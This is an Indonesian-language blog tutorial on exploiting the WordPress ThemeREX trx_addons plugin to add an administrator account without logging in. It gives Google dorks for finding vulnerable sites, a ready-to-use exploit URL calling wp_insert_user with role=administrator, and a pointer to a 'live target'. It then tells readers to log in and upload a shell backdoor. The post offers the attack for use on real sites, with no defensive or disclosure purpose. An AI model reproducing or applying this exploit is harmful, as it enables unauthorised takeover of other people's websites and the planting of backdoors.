Wordpress plugin ThemeREX Unauthenticated add admin


Hai sobat

Saya ikal,

Disini saya akan sharing - sharing sesuatu nih.

-

 

 Sesuai judul kita kali ini, kita akan kembali membahas sebuah exploit yang berada pada Wordpress, jadi kemarin kemarin saya melihat seseorang soof dengan proof Wordpress themerex add admin. Saya pun langsung mencari cari referensi untuk sebuah proof tersebut. dan hasilnya banyak artikel yang menuliskan bahwa itu adalah 0day exploit :D



lihat, 0day exploit :D. Lalu satu hari kemudian saya melihat sebuah konten youtube mengenai exploit tersebut, dan kebetulan kontennya singkat-padat-jelas. untuk link youtubenya nanti saya cantumkan di akhir ya......


Bahan :

- Google Dork : 

"wp/wp-content/plugins/trx_addons"

"blog/wp-content/plugins/trx_addons"

"test/wp-content/plugins/trx_addons"

"wordpress/wp-content/plugins/trx_addons"

- Exploit :

/wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=Haikal&user_pass=Haikal

- Webshell : 

 


Okeh pertama tama kita tentukan target untuk di eksekusi yah... Disini saya sudah mempunyai target sendiri, kalian bisa cari target lain atau pakai saja live target disini yah.

Live target : 
 

nah seperti itu tampilan dari live target nya. Lanjut salin exploit dan masukan keurl targetnya. Contohnya seperti ini : 
https://localhost/[path]/wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=Haikal&user_pass=Haikal
atau 
https://localhost/wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=Haikal&user_pass=Haikal
 
Karena ini add admin, jadi tujuan dari exploitasi ini adalah login sebagai admin dan melakukan penguploadan shell backdoor melalui dashboard admin.
 
Karena ini berbasis Wordpress cms jadi, admin login terdapat di /wp-login.php . Okeh kita lanjut kepembahasan, Sesudah memasukan exploit ke url target masing-masing, maka akan muncul json response. 

Tampilan jika website tersebut vuln dan username,password yang di submit melalui exploit tadi berhasil disimpan kedalam database seperti dibawah ini 


nah, jika seperti itu maka kemungkinan vuln.Terlihat diatas sana terdapat kata 

data   [angka]

angka akan disesuaikan dengan berapa banyak user yang tersimpan didalam database. Jadi jika angka yang kalian dapat bukan 7, itu tidak masalah.

 

Dan jika target kalian memunculkan response seperti di bawah ini maka itu artinya kalian ga cocok :D.



diatas sana muncul kata 


status    404

 

Nah itu menandakan bahwa request yang disubmit itu tidak ada atau 404. ya gitulah pokonya :D. Jika target vuln, kalian lanjut akses admin login dan masukan username,dan password nya. 

Yaitu :

U : Haikal

P : Haikal



klik Login dan kalian akan diarahkan ke dashboard admin. 



Nah berhasil kan :D. Selanjutnya kalian gunakan akal cerdas kalian untuk mengupload shell backdoor kalian.


*Note : di live target saya kali ini, jika kalian memasukan exploit nya dengan username,password Haikal kedalam url, maka akan muncul 


0    "Sorry, that username already exists!"

 

Karena apa? karena username tersebut sudah terdaftar didalam list yang ada didatabase.Nah segini aja pembahasan kali ini mengenai Wordpress themerex add admin, 

 Jika ada yang kurang atau salah kata biarkan saja.

 

Referensi : https://www.youtube.com/watch?v=-dofdrDlrcg 

 

Thanks

See U